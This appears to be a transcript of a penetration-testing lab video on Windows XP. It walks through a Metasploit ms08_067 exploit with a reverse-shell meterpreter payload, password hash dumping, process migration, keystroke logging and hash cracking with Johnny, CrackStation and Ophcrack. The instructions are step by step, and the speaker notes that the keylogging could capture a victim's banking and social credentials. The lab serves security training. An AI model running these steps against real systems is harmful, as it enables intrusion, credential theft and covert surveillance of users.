So in this lab, we're going to work on escalating privileges. What we're going to do here is we're going to work on stealing passwords and cracking those passwords. Also, we're going to migrate around from processes from a system level to a user level and back. To get started, we need to open up our Metasploit framework. From our Metasploit framework, we're going to use the same exploit we did last time. So we'll just type in use exploit/windows smb ms08_067_natapi. Then we're going to set our payload, and we're going to use the meterpreter payload that we used before, which is windows/meterpreter/reverse TCP. Now at this point, we're going to show our options, and you'll notice that we need to set our R host and our L host. So we're going to set our R host for our Windows machine. In my case, the IP for that is .56.100, and then I'm going to set my L host to my Kali machine, which in my case is 56.102. Then I will show my options one more time, and you'll see at this point that I have my Windows machine IP as my R host. We're going to be attacking port 445 with the Natapi vulnerability. We're going to use our payload of meterpreter, and we're going to have the callback go back to our Kali machine on port 4444. And now at this point, we're just going to type in exploit. And just like before, we now have an established connection where we've triggered the vulnerability in the Windows XP machine, and it is called back to us with the stage 2, and we have that connection from the Windows machine here to our Kali machine here. So now we're at the meterpreter prompt. So what do we want to do? Well, the first thing I want to do is I want to know what process I am. So I'm going to type in get PID, and it tells me that I'm process 980. So to understand what that is, I'm going to type in PS, which is going to list all of the running processes on the Windows machine. And here you can see that the running process, expand this just a little bit more for you. So as you can see, process 980 is right here. It's the service host process. And that is actually the system level user, ntauthority/system. So right now we already have system level rights on this machine, so there's no need to escalate our privileges. But if we were a lower level user, we would have to escalate our privileges up. So I'm going to show you some techniques for doing that as well. The reason why we are a system level user in this case is because the exploit we're doing is the service host, and the service host is always run as system. Now, if instead we use something like a spear phishing campaign, we would end up being brought in as that user who probably doesn't have admin rights, and we'd have to work our way up. And we can still run a lot of the same processes like the hash dumps and password cracking to start from there and migrate upward. So now that we see what process we're in, let's go ahead and see what system ID we do have. So we'll just type in get SID, and you'll notice that it says we are S-1-5-18. Now anything under 500 is going to be a system level type process, whether that's going to be something like the local service or the system itself. Now once we get into users, they start out at 1000 and go above. If you're the administrator, that's a 500 level account. So this last dash number here is going to tell us a lot about what type of process that is and what type of user we are. So now that we're here, let's go ahead and do a hash dump, and we'll see what other users are on the system. So here we go. We have the administrator account. Again, that's that SID 500. We have a guest, which is SID 501. We have the help assistant starts at 1000. The John Sim user is user 1003. And then we have this support account, which is 1002. So what I'm going to do is I'm just going to copy all of this text here, and we're going to put it into a text file, and we're going to save that to our desktop. And to do that, I'm just going to open a terminal here. I'm going to type in gedit, which is a graphical text editor, and we can just paste that in, and then we're going to go ahead and save it to the desktop so we'll know where it is, and we'll just call that hash dump. And at this point we can close that out, and we can close out that one. So now we have a text file with that information, so we can use that in our password cracking. Now before we get to that, I'm going to still play with meterpreter a little bit more here first and show you some other things. So one of the things I talked about before is that we can do a migration from one process to another, and that should change us into that user. So for instance, right now we are in process 980, which is NT Authority System. Now if I wanted to become John Sim, for instance, the user on this machine, because if I started running things as system like the notepad, that would look suspicious, but if I did it as John Sim, it wouldn't. So I'm going to go ahead and change myself into this one right here, which is process 1248, and that should change me into John Sim, who has a SID of 1003. So what we're going to do is just type in migrate, and the PID we want to go to, which in this case is 1248. So migrate to 1248, and you'll see that we're migrating from 980 to 1248. It takes a couple of seconds, and now we should be loaded into that process. It says we're complete. So let's get PID and make sure that we are in the process we wanted. So get PID, we verified we are in 1248, and so now if I do PS, you can see that 1248 is a process owned by John Sim. So let's get our SID and verify that. It should tell us that we're SID 1003 because that's John Sim's SID. And in this case, we do have SID 1003, which is John Sim. So that's how you can migrate from one user to another and one process to another. Now, why else might you want to migrate processes? Well, we'll talk about covering our tracks later, but one of the things we want to do is to cover our tracks is to migrate from processes. And for instance, if we did a vulnerability such as a Internet Explorer exploit, Internet Explorer tends to crash a lot. If the process I'm sitting in crashes, I'm going to lose my access. So if I break in through Internet Explorer, I'm going to want to migrate to something more stable and more hidden, such as the service host account, or the services.exe, or explorer.exe, because they're a lot more stable and they don't crash as often. Now, the other thing to note is why might I want to go to a user that's not system or admin? Like in this case, John Sim's a regular user. Why would I want to migrate into him? Well, one of the reasons why I might want to do that is if I wanted to do key logging. So if I wanted to key log John Sim, I have to be logged in as John Sim. And so in this case, I now am John Sim, so I can start my keylogger and capture those keystrokes. We talked about this before, but I'll go ahead and show that to you now because again, this is another way to escalate our privileges. If John happens to have admin rights and he's on his user account daily and then types in his password to elevate into an admin status, like he installed a new printer or something like that, we'd be able to capture that password. Let me bring up the keylogger commands here again just to remind us. So we'll go up here to help, and we have our key scan start, key scan stop, and again our key scan dump to get those keystrokes. So let's go ahead and start it by doing key scan start. So if I go here and do a key scan start, and now John Sim is on his machine, and let's say he was opening up a notepad and typing in his passwords. Here's my email address and my password of password. And then he decides, you know, that's really not a secure way to save my passwords. I'm going to go ahead and delete those. So he just gets rid of that, never had any evidence. Well, we happen to capture it because we were capturing his keystrokes. And so right here you can see he pressed return, he did password list, hit return, typed in that, hit return, and then password. So why might this be useful? Well, if I had my key scanner going the whole time and I'm capturing all this data, I can capture his side of all conversations, all his instant messages, all his emails, all his usernames and passwords. All of this information is stuff that I can use to elevate my permissions and spread laterally into other systems. So I might now have his usernames and passwords for his banking, his Facebook, his Twitter, all of that stuff because we captured all those keystrokes. It's a pretty cool technique. So now, going back to our escalating privileges, we're still sitting here as John Sim as the user. So the next thing we want to look at is migrating back to system, and we'll go ahead and do that. We'll just do a PS so we can figure out what process we want to go to, and we can go ahead and migrate ourselves into 980 again, just like we were before, and go back to system, and we'll just migrate 980. Again, that's going to move us back, and at this point we should now be the system level user. So we'll do that get PID, we're in 980, get SID, we're back to the system level user, which is that -18. One other thing I'll show you, we're going to go back to John Sim here one more time because I forgot to show this to you. We'll go back to his PID, which was 1248. So now we're back here. You can see that we are user 1003. Again, that's John Sim. Another way to get system is actually using the command get system, and it's part of Meterpreter. And so if you just type in get system, it will go ahead and move and get you system level access. So now if I get my SID, I'm back here as the system level. Now let's see what process it put us in. We're still in John's process, but we are the system user now. So that's something else that you can look at here. It's an interesting technique, and it works most of the time. Now, the time this won't work is if you are some low-level account that's below a user. So if we look up here in the process list, you'll see that there's this local service account, for instance. This isn't even a user account. This is below user. All it does is local services, and this happens to be for the sound drivers in my system. Now you also have this network services. These processes have such low level access, you can't migrate back into John or back into system because you're too low of a level at that point. The only way to break back into this is actually to exit out of the system and then re-exploit the system. So be careful where you jump into, because if you have system or domain level rights and you go down to a standard user to do something like a keystroke, depending on that user's level of access, you can actually get yourself stuck in that user and you're going to be done at that point. And that's why being able to have their password to be able to log in as them is very important. And that's where our hash dump came in. So if you remembered, we had run the hash dump command and we got all of these hashes. And so what I ended up doing with them is I put them in this text file. So what we're going to do is we're going to use a program called Johnny. So under Applications, we'll go into Password Attacks and click on Johnny. Now from Johnny, we're going to open a password file. And the file we're going to open is on our desktop, and it's called hash dump. That was the file that we put in the text. Now as we go through, it immediately starts and it starts going through the attack for us. It's going to try to crack any of the passwords it can find based on the hashes. And so here you see administrator is already cracked as password, and it's working on John Sim. So far it doesn't know what the first part is, but it got the last two letters, which is HO. Now this is doing a brute force attack, so this can take a long time as it tries to crack things if they're not real words. So in the case of John Sim, this actually says Doctor Who. So the first part of it is going to be doctor with a W at the end. That's not a real word, so it's going to take a long time for it to go through and do its cracking. Now, something that would be a lot quicker is for us to go to something like CrackStation on the internet. And so let's go ahead and I'll show you how that works with John Sim here. So when we created our Kali machine, we didn't allow copy and pasting from Kali back to our desktop environment. So I'm going to have to actually type that in. So it's cdd3ae 5197AA40cc 477A180BA53335E6. And then we're going to go ahead and put in the code over here, which is Diesel Lion is what it looks like, and then crack the hash. And you'll see how quickly it's going to come back with CrackStation. Comes back immediately, and it gives us lots of different choices of what it thinks it could be based on the fact that we have that particular hash. Now, why are there multiple things that it could be based on this hash? So the reason why we have this duplication is there's actually repetition in the hash tables. One of the reasons for that is that LM hashes only support 14 characters. Anything over 14 characters, what it does is it breaks them in half. 7 letters and 7 letters. Hashes each part and then goes again. So in our case, you'll see the fact that we have this Dr. Woodland, Doctor Who web guide, Doctor Who web guide, and if you hash any of these, it comes back to the same hash. Now, what does this tell us? Because now we're like, oh, which one do we choose? Well, if we go back to our Jack the Ripper, if you remember, we ended up having, if we count the letters, D-O-C-T-O-R-W. That is the first 7, and notice that all of these first 7 are the same, Dr. W. So that's going to give us the first 7 letters, guaranteed. Well, the nice thing was we had already found the last 2 letters was H-O. So we could figure out now it's Dr. W-H-O, Doctor Who. And then we can use that as the password to get it. There's a little bit of work here required, and again, eventually Johnny is going to go through and crack it all for us, but it hasn't been able to do it yet. Now, there's one more program here that we can use. In fact, there's lots of different programs we can use for password cracking. Another one that's really good is ORFcrack. Now, ORFcrack does require you to have an internet connection so you can download the tables, because if you don't have the tables, it's not really effective. So if you go into this area where table selection is and you click install, you'll be able to install the tables once you download them to your system. But we're going to have to connect the Kali box to the internet first to do that. Now, where do you get those tables from? Well, if you click on help, it'll tell you exactly where to go. You can go to orfcrack.sourceforge.net, and there is a bunch of tables that they have for you, including the XP Free, XP Free Fast, and Vista Free Fast rainbow tables. If you want other tables, they do sell those, but they do have a cost to them. Since we're using XP Machine, we can download the XP Free Small or XP Free Fast to try to do this rainbow cracking on your own and seeing how much more effective it is than doing the methods we just saw. But again, going through CrackStation, all the tables are already loaded, and it's very quick and easy for you to get those passwords.